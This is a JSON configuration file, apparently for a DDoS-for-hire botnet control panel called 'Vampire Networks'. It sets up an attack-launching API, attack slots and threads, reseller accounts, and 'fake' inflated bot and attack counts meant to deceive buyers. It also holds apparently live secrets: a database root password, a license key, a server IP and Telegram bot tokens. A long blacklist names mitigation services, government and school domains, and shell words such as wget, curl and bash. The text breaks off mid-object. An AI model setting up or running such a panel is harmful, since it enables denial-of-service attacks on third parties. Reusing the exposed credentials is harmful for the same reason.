{
    "license_key": "LEL20Y3MXLgvR1MIiibghokH0C3zjAO40srZfexp3DOnLq591TfZwTkJE1xMSBarMCgZ",
    "ssh_server_config": {
        "server_ip_address": "69.165.65.148",
        "private_key": "assets/sshKey.ppk"
    },
    "cnc_whitelisting": {
        "enabled": false,
        "whitelisted_ips": []
    },
    "api_access_config": {
        "note": "Put port 80 below if you plan on using Cloudflare to protect your API.",
        "api_ip_address": "69.165.65.148",
        "api_port": 80,
        "settings": {
            "api_access_enabled": true,
            "debug_mode_enabled": true,
            "custom_attack_sent_page": {
                "enabled": true,
                "html_file": "attack_sent.html"
            },
            "developer": {
                "subdirectory": {
                    "api": "api",
                    "admin": "admin"
                },
                "path": {
                    "api": {
                        "attack": "attack",
                        "view_ongoing": "view_ongoing",
                        "view_plan": "view_plan",
                        "network_statistics": "network_statistics"
                    },
                    "admin": {
                        "view_user_plan": "view_user_plan",
                        "view_user_logs": "view_user_logs",
                        "view_all_logs": "view_all_logs",
                        "view_all_users": "view_all_users",
                        "add_user": "add_user",
                        "edit_user": "edit_user",
                        "remove_user": "remove_user",
                        "key_info": "key_info"
                    }
                }
            }
        },
        "additional_security": {
            "force_tls": false,
            "domain_lock": {
                "note": "Enabling this will only allow people to access your API with the domain below.",
                "enabled": false,
                "domain": "vampire-botnet.com"
            }
        }
    },
    "database": {
        "host": "localhost:3306",
        "username": "root",
        "password": "usnexus1111",
        "table": "xxx"
    },
    "settings": {
        "initial_connection": {
            "display_banner": {
                "enabled": false,
                "message": "**** Authorized users and purposes only - Violators will be prosecuted ****\r\n\r\nAccess to this and use of system are restricted to authorized users and\r\ndesignated purposes. Unauthorized acccess or access attempts to this system,\r\nas well as use of this system for prohibited purposes are a crime. Criminal\r\ntrespass to this system will be prosecuted.\r\n\r\nTo maintain proper system operation and detect/deter unauthorized use, system\r\nadministrators may monitor this system. All user activities may be observed,\r\nrecorded, and/or subject to automated logging.\r\n\r\n * Acceptance and Agreement *\r\nContinuing past this point constitutes attestation of your authorization to\r\naccess this system, agreement that your use of this system falls within the\r\nscope of allowed purposes, and your acceptance of and consent to monitoring,\r\nlogging, and recording of your activities.\r\n\r\n * Disagreement *\r\nIf you do not agree to all of the above, you must immediately disconnect from\r\nthis system."
            },
            "max_wrong_password_attempts": 3
        },
        "multi_factor_authentication": {
            "forced": false,
            "app_name": "My Cool Botnet",
            "forced_on_who": {
                "note": "Only enable one of the options below. ('all_users', 'exclude_users', 'single_users', 'exclude_admin')",
                "all_users": false,
                "exclude_users": {
                    "note": "Enabling this will force everyone to use MFA except the users below.",
                    "enabled": false,
                    "usernames": [
                        "root"
                    ]
                },
                "single_users": {
                    "note": "Enabling this will only force the users below to use MFA.",
                    "enabled": false,
                    "usernames": []
                },
                "exclude_admin": true
            }
        },
        "login_captcha": {
            "forced": false,
            "ascii": true,
            "forced_on_who": {
                "note": "Only enable one of the options below. ('all_users', 'exclude_users', 'single_users', 'exclude_admin')",
                "all_users": false,
                "exclude_users": {
                    "note": "Enabling this will force everyone to do a login captcha except the users below.",
                    "enabled": false,
                    "usernames": [
                        "root"
                    ]
                },
                "single_users": {
                    "note": "Enabling this will only force the users below to do a login captcha.",
                    "enabled": false,
                    "usernames": []
                },
                "exclude_admin": true
            }
        },
        "prompt": {
            "gradient": {
                "enabled": false,
                "settings": {
                    "initial_hex_colour": "00FFFB",
                    "final_hex_colour": "FB00FF"
                },
                "suffix_settings": {
                    "suffix_space": false,
                    "suffix_colour": "[97m",
                    "suffix_text": ""
                },
                "note": "Only enable one of the options below. ('foreground', 'background')",
                "foreground": {
                    "enabled": true
                },
                "background": {
                    "enabled": false,
                    "text_colour": "[30m"
                }
            }
        },
        "logging": {
            "log_ips": true,
            "log_attacks_to_file": true,
            "log_failed_api_requests": true
        },
        "timeouts": {
            "api_timeout_seconds": 30,
            "server_timeout_seconds": 30,
            "botnet_timeout_seconds": 30,
            "max_idle_seconds": 999999
        },
        "visual": {
            "classic_ongoing_command": false,
            "classic_online_command": false,
            "forced_use_of_dport": true
        },
        "reseller_permissions": {
            "can_create_how_many_users_per_day": 3,
            "can_edit_users_they_made": true,
            "can_view_user_count_command": true,
            "can_remove_users_they_made": true,
            "can_kick_users_they_made": true,
            "can_ban_users_they_made": true,
            "can_lock_users_they_made": true,
            "can_view_users_they_made": true,
            "can_change_pass_of_users_they_made": true,
            "can_add_new_resellers": true
        },
        "general": {
            "first_login": {
                "initial_username_change": false,
                "initial_password_change": true,
                "allow_account_override_on_first_login": false
            },
            "options": {
                "api_options": {
                    "allow_multi_concurrent_api_attacks": true,
                    "api_users_can_send_attacks_from_cnc": true
                },
                "guest_user": {
                    "note": "Enabling this will prevent the username below from changing their password.",
                    "enabled": false,
                    "username": "guest"
                },
                "new_user_defaults": {
                    "theme": "default",
                    "max_daily_attacks": 10
                },
                "misc": {
                    "cnc_name": "Vampire Networks",
                    "title_update_sleep_ms": 1500,
                    "tos_page_enabled": false,
                    "numverify_access_key": "numverify.com api key goes here",
                    "expired_message": "Your account has expired.",
                    "username_blacklists": [],
                    "super_users": [
                        "root"
                    ]
                }
            },
            "fake_options": {
                "bots": {
                    "max": 1640,
                    "min": 1630
                },
                "online_users": {
                    "enabled": true,
                    "add_extra": 17
                },
                "ongoing_attacks": {
                    "enabled": true,
                    "add_extra": 7
                }
            },
            "home_holder_custom_concurrents": {
                "enabled": false,
                "home_holder_method_name": "hold",
                "options": {
                    "note": "THIS IS BEING WORKED ON. Only enable one of the two options below. ('all' or 'select')",
                    "all": {
                        "enabled": true,
                        "home_holder_concurrents": 1
                    },
                    "select": {
                        "enabled": false,
                        "who_has_access": [
                            {
                                "username": "root",
                                "home_holder_concurrents": 1
                            }
                        ]
                    }
                }
            },
            "information_rewrites": {
                "online_command": {
                    "user_ip_address": {
                        "hide": true,
                        "hidden_text": "1.1.1.1"
                    },
                    "user_username": {
                        "hide": true,
                        "hidden_text": "User"
                    },
                    "unknown_ssh_client": "Unknown"
                },
                "ongoing_command": {
                    "target": {
                        "hide": true,
                        "hidden_text": "?"
                    },
                    "method": {
                        "hide": true,
                        "hidden_text": "?"
                    },
                    "port": {
                        "hide": true,
                        "hidden_text": "?"
                    },
                    "duration": {
                        "hide": true,
                        "hidden_text": "?"
                    },
                    "remaining": {
                        "hide": false,
                        "hidden_text": "?"
                    },
                    "attack_sender": {
                        "hide": true,
                        "hidden_text": "?"
                    }
                },
                "host_information": {
                    "unknown_region": "?",
                    "unknown_country": "?",
                    "unknown_country_code": "?",
                    "unknown_city": "?",
                    "unknown_zip": "?",
                    "unknown_isp": "?",
                    "unknown_asn": "?",
                    "unknown_org": "?",
                    "unknown_timezone": "?"
                }
            },
            "dlc_options": {
                "aio_funnel": {
                    "information": "you must have the paid aio funnel dlc to use this feature",
                    "note": "if you enable the option on the line below, your attacks will be sent through 'assets/dlc/funnel.json'",
                    "enabled": false
                },
                "telegram_bot": {
                    "information": "you must have the paid telegram dlc to use this feature",
                    "enabled": false,
                    "bot_token": "",
                    "bot_debug_mode_enabled": false,
                    "bot_timeout_seconds": 30,
                    "start_message": ""
                },
                "gambling": {
                    "information": "you must have the paid gambling dlc to use this feature",
                    "note": "if you enable the option on the line below, you can check out 'assets/dlc/gambling.json'",
                    "enabled": false
                },
                "reverse_proxy": {
                    "information": "you must have the paid reverse proxy dlc to use this feature",
                    "enabled": false,
                    "api_token": "",
                    "api_host": "127.0.0.1",
                    "api_port": 8089
                }
            },
            "developer": {
                "note": "BE CAREFUL WHEN MODIFYING THESE SETTINGS/OPTIONS.",
                "terminal": {
                    "width": 800,
                    "height": 22
                },
                "resizing": {
                    "online_command": {
                        "enabled": false,
                        "width": 80,
                        "height": 24
                    },
                    "ongoing_command": {
                        "enabled": false,
                        "width": 80,
                        "height": 24
                    }
                },
                "table_styles": {
                    "online": "compact",
                    "ongoing": "compact"
                },
                "api_info_mode": false,
                "ghost_mode": false,
                "block_more_than_one": false,
                "disabled_commands": [],
                "anti_close_open": [],
                "blocked_ssh_clients": [
                    "ssh2js",
                    "ubuntu"
                ]
            }
        }
    },
    "attack_settings": {
        "method_groups": [
            {
                "name": "Main Network",
                "max_slots": 1000,
                "cooldown": 0,
                "custom_role_name": "main_network"
            },
            {
                "name": "Private Network",
                "max_slots": 3,
                "cooldown": 0,
                "custom_role_name": "private_network"
            }
        ],
        "blacklists": {
            "hard_host": [
               "141.98.7.9",
                "46.105.233.108",
                "160.20.145.152",
                "nosec.dstat.online",
                "google",
                "path",
                "mysql",
                "github",
                "localhost",
                "dstat",
                "wget",
                "curl",
                "https://vypex.online/",
                "discord",
                "cloudflare",
                "google",
                "bnd.bund.de",
                "countbout",
                "countbot",
                "bundespolizei.de",
                "sisar.network",
                "niggas.network",
                "request.social",
                "cunhua.today",
                "ogcdn.mom ",
                "eporner.com ",
                "ventox.lol",
                "mrrage.xyz",
                "shitflare.asia ",
                "hitsagainstaraid.click",
                "hitmehard.de",
                "zetvideo.net",
                "nsa.codes ",
                "xnexustesting.eu ",
                "vshield.pro ",
                "nexa-solutions.com",
                "h-v-h.xyz",
                "webstress.xyz",
                "tcphangjews.space",
                "dstatx.com",
                "xenema.xyz",
                "dstatx.com",
                "skystress.space",
                "opensuse.org",
                "digitalstress.net",
                "wincat.lol",
                "baloo.dog",
                "sokin.lol",
                "bxv.gg",
                "waves-security.lol",
                "ventryshield.net",
                "ddosfilter.net",
                "netamp.org",
                "fedcc.online",
                ".gov",
                ".edu",
                ".onion",
                ">",
                "<",
                "127.0.0.1",
                "1.1.1.1",
                "0.0.0.0",
                "8.8.8.8",
                "8.8.4.4",
                "4.4.8.8",
                "74.74.74.74",
                "https://stix-services.xyz/",
                "136.175.200.62",
                "135.125.214.222",
                "84.54.51.44",
                "194.33.37.14",
                "45.94.223.39",
                "107.189.28.214",
                "50.7.232.90",
                "88.198.14.11",
                "88.198.48.45",
                "37.187.56.77",
                "51.15.25.108",
                "91.193.113.71",
                "46.166.142.81",
                "165.22.254.223",
                "94.156.161.7",
                "195.135.221.140",
                "5.189.139.8",
                "88.198.59.166",
                "45.77.86.187",
                "170.178.177.230",
                "176.9.156.199",
                "176.9.46.23",
                "62.210.88.182",
                "https://criminalitynetwork.mysellix.io",
                "https://criminalitynetwork.mysellix.io/shop",
                "185.132.134.87",
                "94.75.220.2",
                "212.8.243.172",
                "185.132.134.130",
                "45.131.145.132",
                "45.131.145.131",
                "109.71.161.136",
                "94.75.220.1",
                "15.235.183.160",
                "94.75.220.5",
                "85.17.15.4",
                "51.178.229.173",
                "185.245.60.95",
                "185.244.165.251",
                "96.255.118.175",
                "15.235.183.160",
                "139.162.227.201",
                "93.123.118.178",
                "185.178.208.133",
                "81.28.12.12",
                "167.235.56.71",
                "135.125.123.67",
                "142.132.140.101",
                "135.125.214.213",
                "185.244.165.231",
                "106.55.94.9",
                "104.200.152.98",
                "45.250.25.167",
                "162.19.226.12",
                "164.132.231.118",
                "51.81.222.110",
                "51.81.222.178",
                "145.40.93.33",
                "80.82.76.67",
                "103.65.228.53",
                "38.154.242.34",
                "136.144.49.153",
                "145.40.68.93",
                "147.124.216.121",
                "38.154.238.194",
                "89.187.173.102",
                "65.108.247.86",
                "85.159.214.116",
                "38.84.24.15",
                "23.227.146.106",
                "178.162.140.205",
                "ventryshield.net",
                "baloo.one",
                "bxv.gg",
                "famy",
                "famy",
                "webstress.xyz",
                "xnexustesting.eu",
                "jsc.xnexustesting.eu",
                "lock.xnexustesting.eu",
                "dstat.sheesh.rip",
                "komarupics.cam",
                "51.15.25.108",
                "vvxc",
                "162.19.80.33",
                "dvlopd.cf/v1",
                "dvlopd.cf/v2",
                "23.227.146.106",
                "54.38.215.87",
                "91.239.130.32",
                "141.24.210.140",
                "50.7.239.226",
                "baloo",
                "sheesh.rip",
                "146.56.169.5",
                "8.28.7.208",
                "142.234.177.221",
                "23.92.29.131",
                "46.166.142.81",
                "5.189.139.8",
                "160.121.154.66",
                "nofirewallprotect.tz-sec.com",
                "ashdi.vip",
                "stats.texttv.nu",
                "www.pspb.ky",
                "demo.nginx.com",
                "metsul.com",
                "shape.host",
                "bossan.ba",
                "letsfeelz.com",
                "udprand.xyz",
                "944online.com",
                "layer7-waf.com",
                "cantdown.me",
                "dstat.sheesh.rip",
                "193.35.18.248",
                "sas.org.uk",
                "sayeret.mystore.today",
                "theinternationaliqtest.com",
                "flowextra.com",
                "feverclan.com",
                "bxv.gg",
                "test.nolink.ch",
                "changilighting.com",
                "studytest243.top",
                "sayto1k.ru",
                "alavotremag.com",
                " sukumi.gay",
                "138.128.240.5",
                "45.142.122.104",
                "185.106.94.40",
                "100.21.12.60",
                "50.31.116.98",
                "160.20.146.14",
                "5.189.137.59",
                "37.19.216.166",
                "206.189.249.141",
                "45.42.247.132",
                "135.181.45.33",
                "96.126.124.45",
                "37.59.34.117",
                "51.255.70.12",
                "51.77.74.130",
                "2.59.135.78",
                "5.10.105.198",
                "138.128.240.5",
                "23.227.142.74",
                "50.7.198.146",
                "176.9.16.251",
                "85.10.197.131",
                "85.10.195.175",
                "95.211.208.171",
                "78.31.67.223",
                "51.38.92.223",
                "51.15.25.108",
                "89.149.203.181",
                "212.7.203.224",
                "89.185.85.62",
                "141.24.210.140",
                "79.137.206.198",
                "35.246.217.88",
                "34.90.171.151",
                "103.143.76.240",
                "135.181.45.33",
                "188.34.200.199",
                "185.52.13.199",
                "52.148.208.182",
                "23.183.244.77",
                "151.139.83.14",
                "2.59.135.78",
                "172.111.203.77",
                "108.61.210.201",
                "108.61.210.201",
                "51.79.146.161",
                "50.7.198.146",
                "85.10.195.175",
                "51.159.30.249",
                "46.166.142.81",
                "51.38.92.223",
                "95.211.208.171",
                "99.209.23.196",
                "136.144.49.153",
                "89.187.181.197",
                "136.144.49.99",
                "20.106.75.231",
                "31.13.241.41",
                "192.99.185.212",
                "74.91.124.107",
                "185.25.206.35",
                "185.76.9.113",
                "38.84.24.13",
                "45.136.153.147",
                "212.102.36.249",
                "37.59.252.4",
                "31.220.0.115",
                "91.239.130.11",
                "109.70.148.224",
                "146.59.148.119",
                "189.1.173.191",
                "45.140.142.143",
                "104.194.206.43",
                "93.115.28.93",
                "37.19.216.165",
                "45.58.141.21",
                "46.28.204.24",
                "2.59.135.78",
                "185.165.171.107",
                "23.92.27.154",
                "103.143.76.240",
                "194.147.90.113",
                "50.31.65.8",
                "45.81.17.38",
                "89.208.105.58",
                "20.106.75.231",
                "51.222.249.118",
                "5.254.65.22",
                "37.221.168.26",
                "136.144.49.153",
                "109.70.148.224",
                "99.209.23.197",
                "141.24.210.140",
                "91.149.224.223",
                "20.106.75.231",
                "104.194.8.40",
                "35.204.191.205",
                "23.227.146.106",
                "23.227.167.86",
                "66.42.124.134",
                "51.89.64.42",
                "35.184.26.226",
                "157.245.137.132",
                "54.193.93.182",
                "45.35.210.51",
                "5.196.39.50",
                "162.0.225.53",
                "51.91.192.110",
                "38.84.14.4",
                "23.227.131.170",
                "212.102.40.198",
                "23.227.134.122",
                "193.200.209.130",
                "178.237.56.152",
                "104.46.124.66",
                "109.70.148.223",
                "194.88.104.81",
                "185.121.172.11",
                "80.64.103.27",
                "23.227.146.106",
                "95.216.12.48",
                "148.251.238.46",
                "51.89.211.29",
                "193.107.177.1",
                "8.26.94.147",
                "8.8.8.8",
                "51.83.67.106",
                "66.85.14.193",
                "91.239.130.11",
                "217.146.95.242",
                "66.85.14.193",
                "64.94.100.200",
                "195.85.201.13",
                "cogentv2.dstat.org",
                "cogent.dstat.org",
                "contabo.dstat.org",
                "nforce.dstat.org",
                "cogentus.dstat.org",
                "novogara.dstat.org",
                "85.195.110.5",
                "85.195.107.19",
                "62.221.250.224",
                "88.198.62.107",
                "108.165.179.197",
                "202.84.39.45",
                "66.70.205.227",
                "185.149.22.195",
                "198.251.83.26",
                "185.29.200.17",
                "41.216.182.228",
                "157.245.3.38",
                "66.206.28.118",
                "49.169.94.5",
                "167.71.202.248",
                "165.22.254.223",
                "85.248.130.173",
                "193.33.186.37",
                "147.135.4.8",
                "223.27.85.98",
                "51.89.149.118",
                "51.79.146.161",
                "178.32.129.26",
                "45.56.78.25",
                "23.94.229.168",
                "194.163.152.120",
                "85.195.107.218",
                "172.105.34.241",
                "3.8.217.228",
                "vShield.pro",
                "dstat.vShield.pro",
                "netamp.org",
                "38.84.24.3",
                "srv1-netamp",
                "srv2-netamp",
                "srv3-netamp",
                "srv4-netamp",
                "srv5-netamp",
                "netamp.org",
                "2a03:b0c0:0:1010::26d:1001",
                "blog.bathtubbashing",
                "forum_new.tendust",
                "admin.kingblue",
                "hell.beyondrussia",
                "qeruya.cyou",
                "tortuga.wtf",
                "media-base.co",
                "nl107.cdnsqu.com",
                "s2.ashdi.vip",
                "hgavanaplay.me",
                "vk-video.me",
                "50.7.198.146",
                "85.10.195.175",
                "95.211.208.171",
                "51.15.25.108",
                "109.71.9.87",
                "49.51.35.158",
                "46.166.142.81",
                "proxy.seized.ovh",
                "seized",
                "wrldsecurity",
                "51.195.64.175",
                "unhittable",
                "35.221.231.4",
                "dstat.cc",
                "cyber-hub.pw",
                "dststx",
                "51.89.108.148",
                "212.87.212.140",
                "wrldsecurity",
                "http://ddosfilter.net/",
                "45.140.190.172",
                "79.137.204.116",
                "79.137.202.122",
                ".gov",
                "gov",
                ".edu",
                "edu",
                "sch",
                "school",
                "curl",
                "hospital",
                "gov.gr",
                "wget",
                ">",
                "bash",
                "<",
                "mysql",
                "127.0.0.1",
                "1.1.1.1",
                "cloudflare.com",
                "localhost",
                "bbos.cat",
                "ventox",
                "hitme.ventox",
                "tls.mrrage",
                "stargate.cam",
                "dev.dststx",
                "blitzkrieg.cc",
                "golem",
                "pow.dststx",
                "200.xflare.store",
                "click.xflare.store",
                "high.xflare.store",
                "ventryshield.net",
                "baloo.one",
                "bxv.gg",
                "famy",
                "famy",
                "webstress.xyz",
                "xnexustesting.eu",
                "jsc.xnexustesting.eu",
                "lock.xnexustesting.eu",
                "dstat.sheesh.rip",
                "komarupics.cam",
                "51.15.25.108",
                "vvxc",
                "162.19.80.33",
                "dvlopd.cf/v1",
                "dvlopd.cf/v2",
                "23.227.146.106",
                "54.38.215.87",
                "91.239.130.32",
                "141.24.210.140",
                "50.7.239.226",
                "baloo",
                "sheesh.rip",
                "146.56.169.5",
                "8.28.7.208",
                "142.234.177.221",
                "23.92.29.131",
                "46.166.142.81",
                "5.189.139.8",
                "160.121.154.66",
                "nofirewallprotect.tz-sec.com",
                "ashdi.vip",
                "stats.texttv.nu",
                "www.pspb.ky",
                "demo.nginx.com",
                "metsul.com",
                "shape.host",
                "bossan.ba",
                "letsfeelz.com",
                "udprand.xyz",
                "944online.com",
                "layer7-waf.com",
                "cantdown.me",
                "dstat.sheesh.rip",
                "193.35.18.248",
                "sas.org.uk",
                "sayeret.mystore.today",
                "theinternationaliqtest.com",
                "flowextra.com",
                "feverclan.com",
                "bxv.gg",
                "test.nolink.ch",
                "changilighting.com",
                "studytest243.top",
                "sayto1k.ru",
                "alavotremag.com",
                " sukumi.gay",
                "138.128.240.5",
                "45.142.122.104",
                "185.106.94.40",
                "100.21.12.60",
                "50.31.116.98",
                "160.20.146.14",
                "5.189.137.59",
                "37.19.216.166",
                "206.189.249.141",
                "45.42.247.132",
                "135.181.45.33",
                "96.126.124.45",
                "37.59.34.117",
                "51.255.70.12",
                "51.77.74.130",
                "2.59.135.78",
                "5.10.105.198",
                "138.128.240.5",
                "23.227.142.74",
                "50.7.198.146",
                "176.9.16.251",
                "85.10.197.131",
                "85.10.195.175",
                "2.59.135.78",
                "172.111.203.77",
                "108.61.210.201",
                "108.61.210.201",
                "51.79.146.161",
                "50.7.198.146",
                "85.10.195.175",
                "51.159.30.249",
                "46.166.142.81",
                "51.38.92.223",
                "95.211.208.171",
                "99.209.23.196",
                "136.144.49.153",
                "89.187.181.197",
                "136.144.49.99",
                "20.106.75.231",
                "31.13.241.41",
                "192.99.185.212",
                "74.91.124.107",
                "185.25.206.35",
                "185.76.9.113",
                "38.84.24.13",
                "45.136.153.147",
                "212.102.36.249",
                "37.59.252.4",
                "31.220.0.115",
                "91.239.130.11",
                "109.70.148.224",
                "146.59.148.119",
                "189.1.173.191",
                "45.140.142.143",
                "104.194.206.43",
                "93.115.28.93",
                "37.19.216.165",
                "45.58.141.21",
                "46.28.204.24",
                "2.59.135.78",
                "185.165.171.107",
                "23.92.27.154",
                "103.143.76.240",
                "194.147.90.113",
                "50.31.65.8",
                "45.81.17.38",
                "89.208.105.58",
                "20.106.75.231",
                "51.222.249.118",
                "5.254.65.22",
                "37.221.168.26",
                "136.144.49.153",
                "109.70.148.224",
                "99.209.23.197",
                "141.24.210.140",
                "91.149.224.223",
                "20.106.75.231",
                "104.194.8.40",
                "35.204.191.205",
                "23.227.146.106",
                "23.227.167.86",
                "66.42.124.134",
                "51.89.64.42",
                "35.184.26.226",
                "157.245.137.132",
                "54.193.93.182",
                "45.35.210.51",
                "5.196.39.50",
                "162.0.225.53",
                "51.91.192.110",
                "38.84.14.4",
                "23.227.131.170",
                "212.102.40.198",
                "23.227.134.122",
                "193.200.209.130",
                "178.237.56.152",
                "104.46.124.66",
                "109.70.148.223",
                "194.88.104.81",
                "185.121.172.11",
                "80.64.103.27",
                "23.227.146.106",
                "95.216.12.48",
                "148.251.238.46",
                "51.89.211.29",
                "193.107.177.1",
                "8.26.94.147",
                "8.8.8.8",
                "51.83.67.106",
                "66.85.14.193",
                "91.239.130.11",
                "217.146.95.242",
                "66.85.14.193",
                "64.94.100.200",
                "195.85.201.13",
                "cogentv2.dstat.org",
                "cogent.dstat.org",
                "contabo.dstat.org",
                "nforce.dstat.org",
                "cogentus.dstat.org",
                "novogara.dstat.org",
                "85.195.110.5",
                "85.195.107.19",
                "62.221.250.224",
                "88.198.62.107",
                "108.165.179.197",
                "202.84.39.45",
                "66.70.205.227",
                "185.149.22.195",
                "198.251.83.26",
                "185.29.200.17",
                "41.216.182.228",
                "157.245.3.38",
                "66.206.28.118",
                "49.169.94.5",
                "167.71.202.248",
                "165.22.254.223",
                "85.248.130.173",
                "193.33.186.37",
                "147.135.4.8",
                "223.27.85.98",
                "51.89.149.118",
                "51.79.146.161",
                "178.32.129.26",
                "45.56.78.25",
                "23.94.229.168",
                "194.163.152.120",
                "85.195.107.218",
                "172.105.34.241",
                "3.8.217.228",
                "vShield.pro",
                "dstat.vShield.pro",
                "netamp.org",
                "38.84.24.3",
                "srv1-netamp",
                "srv2-netamp",
                "srv3-netamp",
                "srv4-netamp",
                "srv5-netamp",
                "netamp.org",
                "2a03:b0c0:0:1010::26d:1001",
                "blog.bathtubbashing",
                "forum_new.tendust",
                "admin.kingblue",
                "hell.beyondrussia",
                "qeruya.cyou",
                "tortuga.wtf",
                "media-base.co",
                "nl107.cdnsqu.com",
                "s2.ashdi.vip",
                "hgavanaplay.me",
                "vk-video.me",
                "50.7.198.146",
                "85.10.195.175",
                "95.211.208.171",
                "51.15.25.108",
                "109.71.9.87",
                "49.51.35.158",
                "46.166.142.81",
                "proxy.seized.ovh",
                "seized",
                "wrldsecurity",
                "bbos.lol",
                "feds.lol",
                "51.195.64.175",
                "unhittable",
                "35.221.231.4",
                "dstat.cc",
                "cyber-hub.pw",
                "dststx",
                "51.89.108.148",
                "212.87.212.140",
                "wrldsecurity",
                "http://ddosfilter.net/",
                "45.140.190.172",
                "79.137.204.116",
                "79.137.202.122",
                "95.211.208.171",
                "78.31.67.223",
                "51.38.92.223",
                "51.15.25.108",
                "89.149.203.181",
                "212.7.203.224",
                "89.185.85.62",
                "141.24.210.140",
                "79.137.206.198",
                "35.246.217.88",
                "34.90.171.151",
                "103.143.76.240",
                "135.181.45.33",
                "188.34.200.199",
                "185.52.13.199",
                "52.148.208.182",
                "23.183.244.77",
                "151.139.83.14",
                "83.229.67.249",
                "185.17.0.119",
                "89.185.85.62",
                "141.24.210.140",
                "79.137.206.198",
                "213.238.177.30",
                "18.217.131.26",
                "67.202.70.200",
                "192.227.234.250",
                "185.223.29.128",
                "95.111.226.175",
                "212.102.36.249",
                "206.189.184.179",
                "184.168.64.19",
                "34.68.220.187",
                "34.90.171.151",
                "168.119.255.140",
                "89.21.64.156",
                "45.88.90.102",
                "52.148.208.182",
                "46.166.151.201",
                "66.70.205.227",
                "51.222.104.47",
                "46.105.248.69",
                "104.243.43.184",
                "46.174.50.114",
                "51.15.132.109",
                "5.254.43.164",
                "149.28.47.232",
                "212.8.243.27",
                "139.99.171.153",
                "51.77.127.144",
                "188.68.243.205",
                "88.220.179.251",
                "94.130.104.118",
                "45.94.223.40",
                "18.193.45.110",
                "37.9.59.141",
                "2.56.177.142",
                "45.94.223.96",
                "74.220.31.91",
                "191.96.59.143",
                "104.129.132.205",
                "177.67.80.51",
                "45.137.207.134",
                "173.249.52.150",
                "217.146.84.59",
                "217.146.84.43",
                "217.146.84.42",
                "217.146.84.54",
                "217.146.84.75",
                "217.146.84.58",
                "https://pfcloud.io",
                "217.146.84.79",
                "217.146.84.82",
                "23.229.78.154",
                "23.229.78.155",
                "212.117.188.197",
                "149.11.66.46",
                "50.7.25.2",
                "https://pfcloud.io/analytics",
                "50.7.127.34",
                "193.107.177.65",
                "91.226.4.2",
                "193.107.177.7",
                "93.187.217.71",
                "147.75.101.115",
                "147.28.141.41",
                "50.7.36.250",
                "169.44.153.250",
                "169.44.153.252",
                "185.43.206.93",
                "131.196.198.78",
                "45.88.228.198",
                "95.179.188.23",
                "8.26.94.147",
                "193.107.177.1",
                "51.89.211.29",
                "99.192.181.98",
                "fsb.ru",
                "51.81.222.178",
                "https://cant-hit.us/",
                "https://cant-hit.us",
                "145.40.93.33",
                "139.99.46.21",
                "147.28.141.41",
                "http://fedcc.online/",
                "https://nosec.dstat.online/",
                "https://tcphangjews.space",
                "https://test.dstat.onl",
                "https://test.dstat.online/",
                "51.81.222.178",
                "51.81.222.110",
                "https://l7safe.request.social/safe.php",
                "https://www.zus.pl/"
            ],
            "soft_host": [
                "69.69.69.69"
            ],
            "port": [
                19999
            ],
            "as_number": []
        },
        "user_spam_protection": {
            "in_general": {
                "settings": {
                    "enabled": false,
                    "amount": 10,
                    "per_seconds": 1200
                },
                "what_action_to_take": {
                    "note": "THIS IS BEING WORKED ON. Only enable one of the options below. ('warn_and_block_attack', 'give_captcha', 'lock_account', 'close_user_session')",
                    "warn_and_block_attack": true,
                    "give_captcha": false,
                    "lock_account": {
                        "message": "Automated account lock, reason: Spam",
                        "duration_in_days": 7,
                        "enabled": false
                    },
                    "close_user_cnc_session_and_block_attack": false
                }
            },
            "per_target": {
                "settings": {
                    "enabled": false,
                    "amount": 3,
                    "per_seconds": 30
                },
                "what_action_to_take": {
                    "note": "THIS IS BEING WORKED ON. Only enable one of the options below. ('warn_and_block_attack', 'give_captcha', 'lock_account', 'close_user_session')",
                    "warn_and_block_attack": true,
                    "give_captcha": false,
                    "lock_account": {
                        "message": "Automated account lock, reason: Spam",
                        "duration_in_days": 7,
                        "enabled": false
                    },
                    "close_user_cnc_session_and_block_attack": false
                }
            }
        },
        "attack_options": {
            "general_options": {
                "debug_mode_enabled": true,
                "attacks_are_enabled": true,
                "attacks_disabled_message": "All attacks are temporarily disabled.",
                "admins_bypass_disabled_attacks": false,
                "forced_use_of_threads": false,
                "forced_use_of_len": false,
                "per_api_request_delay": {
                    "enabled": false,
                    "per_api_request_delay_ms": 0
                }
            },
            "slot_options": {
                "total_attack_slots": {
                    "max": 50,
                    "enabled": true
                },
                "users_bypass_total_attack_slots": {
                    "enabled": false,
                    "usernames": []
                },
                "users_bypass_method_slots": {
                    "enabled": false,
                    "usernames": []
                },
                "users_bypass_method_group_slots": {
                    "enabled": false,
                    "usernames": []
                }
            },
            "cooldown_options": {
                "users_bypass_method_group_cooldown": {
                    "enabled": false,
                    "usernames": []
                }
            },
            "cnc_options": {
                "time_before_port": true,
                "len_before_threads": false,
                "cnc_global_cooldown": {
                    "enabled": true,
                    "per_attack_delay_ms": 100
                },
                "after_attack_command_cooldown": {
                    "enabled": true,
                    "seconds": 20
                },
                "len": {
                    "default": 1,
                    "max": 1024,
                    "min": 1
                },
                "threads": {
                    "default": 5,
                    "max": 100,
                    "min": 1
                }
            },
            "api_options": {
                "api_global_cooldown": {
                    "enabled": true,
                    "per_attack_delay_ms": 100
                },
                "show_host_information_in_api_response": true,
                "len": {
                    "default": 1,
                    "max": 1024,
                    "min": 1
                },
                "threads": {
                    "default": 5,
                    "max": 100,
                    "min": 1
                },
                "rps": {
                    "default": 64,
                    "max": 300,
                    "min": 1
                },
                "geo": {
                    "default": "ALL",
                    "list": [
                        "CN",
                        "JP",
                        "US"
                    ]
                }
            }
        }
    },
    "webhooks": {
        "telegram": {
            "attack_sent": {
                "token": "7535533716:AAFalKNLhx644nJpRlS_yKc1wXutTByNoXk",
                "title": "USER ATTACK SENT SUCCESSFULLY",
                "chat_id": "5917899680",
                "enabled": true
            },
            "blacklisted_host": {
                "token": "7535533716:AAFalKNLhx644nJpRlS_yKc1wXutTByNoXk",
                "title": "USER TRIED ATTACKING BLACKLIST",
                "chat_id": "5917899680",
                "enabled": true
            },
            "ip_log": {
                "token": "7535533716:AAFalKNLhx644nJpRlS_yKc1wXutTByNoXk",
                "title": "USER LOGGED IN",
                "chat_id": "5917899680",
                "enabled": true
            },
            "failed_mfa": {
                "token": "7535533716:AAFalKNLhx644nJpRlS_yKc1wXutTByNoXk",
                "title": "USER FAILED MFA",
                "chat_id": "5917899680",
                "enabled": true
            },
            "failed_captcha": {
                "token": "7535533716:AAFalKNLhx644nJpRlS_yKc1wXutTByNoXk",
                "title": "USER FAILED CAPTCHA",
                "chat_id": "5917899680",
                "enabled": true
            },
            "user_actions": {
